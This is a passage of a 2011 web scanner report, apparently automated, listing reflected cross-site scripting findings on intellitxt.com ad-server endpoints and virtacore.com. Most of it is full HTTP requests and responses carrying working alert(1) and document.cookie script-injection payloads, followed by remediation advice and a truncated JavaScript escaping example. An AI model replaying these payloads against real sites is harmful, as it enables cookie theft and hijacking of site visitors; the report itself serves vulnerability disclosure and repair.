2%7D%2C%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A6%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A7%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A8%2Cc%3A%22Internet.com's%20premiere%20site%20for%20mobile%20managers%20and%20IT%20professionals%20is%20where%20wireless%20meets%20business.%20Our%20expert%20analysis%20and%20tips%20will%20guide%20you%20in%20buying%2C%20deploying%2C%20securing%20and%20managing%20mobile%20technology%20in%20the%20enterprise.%20You'll%20find%20strategic%20analysis%2C%20best%20practices%2C%20news%2C%20buyer.s%20guides%20and%20practical%20advice%20on%20how%20to%20evaluate%20and%20support%20a%20wide%20range%20of%20devices%20in%20the%20workforce.%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D&chunk=0&total=7&jscallback=$iTXT.js.c
allback139e99%3balert(1)//26306191dc7 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:21:02 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback139e99;alert(1)//26306191dc7();}catch(e){}

3.65. http://smartphonetoday.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3e2a3%3balert(1)//6d082f7d91e was submitted in the jscallback parameter. This input was echoed as 3e2a3;alert(1)//6d082f7d91e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042459718&pagecl=61592&fv=10&muid=&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&ipid=26011&jscallback=$iTXT.js.callback03e2a3%3balert(1)//6d082f7d91e HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:21:35 GMT
Age: 0
Connection: keep-alive
Content-Length: 19277

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback03e2a3;alert(1)//6d082f7d91e({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.66. http://smartphonetoday.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cff44"-alert(1)-"2e3ab260276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the request parameters are serialised into a JavaScript object literal. The serialiser escapes = in values (refurl ends in \u003d1 in the response) but emits the parameter name verbatim as the object key, so keys as well as values need JavaScript string encoding (\uXXXX for any character outside [A-Za-z0-9]).

Request

GET /v4/init?ts=1298042459718&pagecl=61592&fv=10&muid=&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&ipid=26011&jscallback=$iTXT.js.callback0&cff44"-alert(1)-"2e3ab260276=1 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:21:40 GMT
Age: 0
Connection: keep-alive
Content-Length: 19258

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","cff44"-alert(1)-"2e3ab260276":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82\u003d1","rcc":"us","cc":"us"},null,60);
...[SNIP]...

3.67. http://vbforums.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5943c%3balert(1)//88cafba6704 was submitted in the jscallback parameter. This input was echoed as 5943c;alert(1)//88cafba6704 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The jscallback value must be emitted as bare code, so no output encoding applies: validate it against a strict allow-list of JavaScript identifier characters and dots, and reject anything else.

Request

GET /al.asp?ts=20110218151842&adid=0%2C0%2C0%2C0%2C168581&cc=us&di=29875403%2C28599592%2C28599656%2C30018999%2C30085818&hk=1&ipid=26443&mh=1fc3c70af67df0d9d8cc9dfe06cabe3f&pid=2%2C2%2C2%2C2%2C2&pvm=db1942607d3ea8ded55849e322184dee&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0&kp=544%2C819%3B372%2C881%3B265%2C1144%3B102%2C1627%3B184%2C1701%3B&prf=ll%3A1190%7Cintl%3A2438%7Cpreprochrome%3A5%7Cgetconchrome%3A264%7Ccontint%3A9543%7Ccontl%3A12253%7Cadvint%3A1287%7Cadvl%3A13540%7Ctl%3A13642&jscallback=$iTXT.js.callback105943c%3balert(1)//88cafba6704 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:18:26 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Fri, 18 Feb 2011 15:18:26 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback105943c;alert(1)//88cafba6704();}catch(e){}

3.68. http://vbforums.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4ad8'-alert(1)-'ecc7883e0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the raw query string is assigned to $iTXT.js.pageQuery inside single quotes. If it must be emitted, encode it as a JavaScript string literal (\uXXXX for quotes, backslash, <, > and /) rather than relying on the surrounding quotes.

Request

GET /intellitxt/front.asp?ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVhsSAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:16:59 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVhsSAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:16:59 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:16:59 GMT
Age: 0
Connection: keep-alive
Content-Length: 10597

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
rc="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218151659";})();$iTXT.js.serverUrl='http://vbforums.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26443&d4ad8'-alert(1)-'ecc7883e0c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.69. http://vbforums.us.intellitxt.com/v4/advert [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9cb15%3balert(1)//db24a5d0383 was submitted in the jscallback parameter. This input was echoed as 9cb15;alert(1)//db24a5d0383 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The jscallback value must be emitted as bare code, so no output encoding applies: validate it against a strict allow-list of JavaScript identifier characters and dots, and reject anything else.

Request

GET /v4/advert?ts=1298042320867&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&sid=1fc3c70af67df0d9d8cc9dfe06cabe3f&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&pvm=db1942607d3ea8ded55849e322184dee&ipid=26443&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback99cb15%3balert(1)//db24a5d0383 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:18:23 GMT
Age: 0
Connection: keep-alive
Content-Length: 10217

(function(){var nh = new $iTXT.ui.Hook({value: "applications",uid: "A379E9596BF046EEAB0EA695CA98EC12",uidh: "cccd3cce584bdc87b30947aabdb3865c",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT
...[SNIP]...
d;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('ExpandableFlash');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback99cb15;alert(1)//db24a5d0383();}catch(e){}

3.70. http://vbforums.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 696d5%3balert(1)//34ca25cba28 was submitted in the jscallback parameter. This input was echoed as 696d5;alert(1)//34ca25cba28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The jscallback value must be emitted as bare code, so no output encoding applies: validate it against a strict allow-list of JavaScript identifier characters and dots, and reject anything else.

Request

GET /v4/context?ts=1298042311324&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&sid=1fc3c70af67df0d9d8cc9dfe06cabe3f&pvu=4E7EFD9063FE451AA0D4C6C6D85815AE&pvm=db1942607d3ea8ded55849e322184dee&ipid=26443&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=60204&jsoncl=7046&ppc=-1&hn=47&chunkkey=26443:1fc3c70af67df0d9d8cc9dfe06cabe3f:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Drop%20in%20here%20to%20discuss%20all%20editions%20and%20versions%20of%20Visual%20Basic%20.NET%20(2002%20or%20later)%20or%20anything%20to%20do%20with%20VB%20.NET%20programming.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22This%20forum%20is%20for%20all%20your%20Visual%20Basic%20(versions%203%2C%204%2C%205%2C%20%26%206)%20coding%20questions%20that%20do%20not%20fit%20into%20one%20of%20the%20more%20specific%20forums%20below.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22Post%20all%20your%20questions%20here%20regarding%20Microsoft%20Office%20Automation.%20This%20can%20include%20VSTO%2C%20VSTA%2C%20and%20VBA%20questions.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22This%20forum%20is%20the%20place%20to%20post%20all%20your%20questions%20about%20using%20the%20Internet%20within%20your%20applications.%20Topics%20include%3A%20writing%20components%20for%20ASP%20(classic)%2C%20VB%20Script%2C%20and%20more.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22Post%20your%20questions%20about%20developing%20applications%20to%20interact%20with%20databases%20here.%20Topics%20include%20Using%20the%20Data%20Control%2C%20D&chunk=0&total=8&jscallback=$iTXT.js.callback1696d5%3balert(1)//34ca25cba28 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:18:30 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1696d5;alert(1)//34ca25cba28();}catch(e){}

3.71. http://vbforums.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 233b5%3balert(1)//883b0a64c48 was submitted in the jscallback parameter. This input was echoed as 233b5;alert(1)//883b0a64c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The jscallback value must be emitted as bare code, so no output encoding applies: validate it against a strict allow-list of JavaScript identifier characters and dots, and reject anything else.

Request

GET /v4/init?ts=1298042273945&pagecl=60171&fv=10&muid=&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&ipid=26443&jscallback=$iTXT.js.callback0233b5%3balert(1)//883b0a64c48 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR="ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVg/6QA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:18:28 GMT
Age: 0
Connection: keep-alive
Content-Length: 16909

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0233b5;alert(1)//883b0a64c48({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.72. http://vbforums.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vbforums.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb6b"-alert(1)-"6fb46acbb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the request parameters are serialised into a JavaScript object literal. The serialiser escapes = in values (refurl ends in \u003d1 in the response) but emits the parameter name verbatim as the object key, so keys as well as values need JavaScript string encoding (\uXXXX for any character outside [A-Za-z0-9]).

Request

GET /v4/init?ts=1298042273945&pagecl=60171&fv=10&muid=&refurl=http%3A%2F%2Fwww.vbforums.com%2F%3F86b8b--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E5c1edad1dc6%3D1&ipid=26443&jscallback=$iTXT.js.callback0&adb6b"-alert(1)-"6fb46acbb2=1 HTTP/1.1
Host: vbforums.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR="ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wMAAAEuOVg/6QA-"

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:18:33 GMT
Age: 0
Connection: keep-alive
Content-Length: 16889

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
(Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","adb6b"-alert(1)-"6fb46acbb2":"1","refurl":"http://www.vbforums.com/?86b8b--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5c1edad1dc6\u003d1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined=
...[SNIP]...

3.73. http://virtacore.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://virtacore.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66f9b</script><script>alert(1)</script>bbeb208fd95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that this payload never leaves the single-quoted string as far as JavaScript is concerned: the HTML parser ends the <script> element at the first </script> it sees regardless of JavaScript syntax, so escaping only quotes and backslashes is not enough. < and / must be encoded (\u003c, \u002f) as well, or the value rejected.
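An encoder that closes both gaps seen in 3.66, 3.68, 3.72 and 3.73, as an added example that is not code from any of those sites or from this report: every string destined for a <script> body, object keys included, is turned into a \uXXXX-escaped literal, which takes care of quotes, backslashes and the </script> sequence at once. The function names are assumptions; the three inputs are the report's own payloads, URL-decoded.

```javascript
// Added example; not code from any of the sites in findings 3.66, 3.68, 3.72
// or 3.73. Those responses drop request data into JavaScript in two ways:
// the raw query string inside a quoted string (pageQuery='...', query:'...')
// and request parameters serialised into an object literal with the
// parameter *name* used verbatim as the key. Both are fixed by encoding every
// string, keys as well as values, for the JavaScript-inside-<script> context.

// Encodes s as a double-quoted JavaScript string literal. Every UTF-16 unit
// outside a small safe set becomes \uXXXX, which covers both quote characters,
// backslash, "<", "/" and ">" (so "</script>" cannot end the element), "&",
// newlines and the JS line terminators U+2028/U+2029. Surrogate halves are
// escaped individually, which is still a valid literal.
function jsStringLiteral(s) {
  s = String(s);
  let out = '"';
  for (let i = 0; i < s.length; i++) {
    const ch = s[i];
    if (/^[A-Za-z0-9 ,.:_=?-]$/.test(ch)) out += ch;
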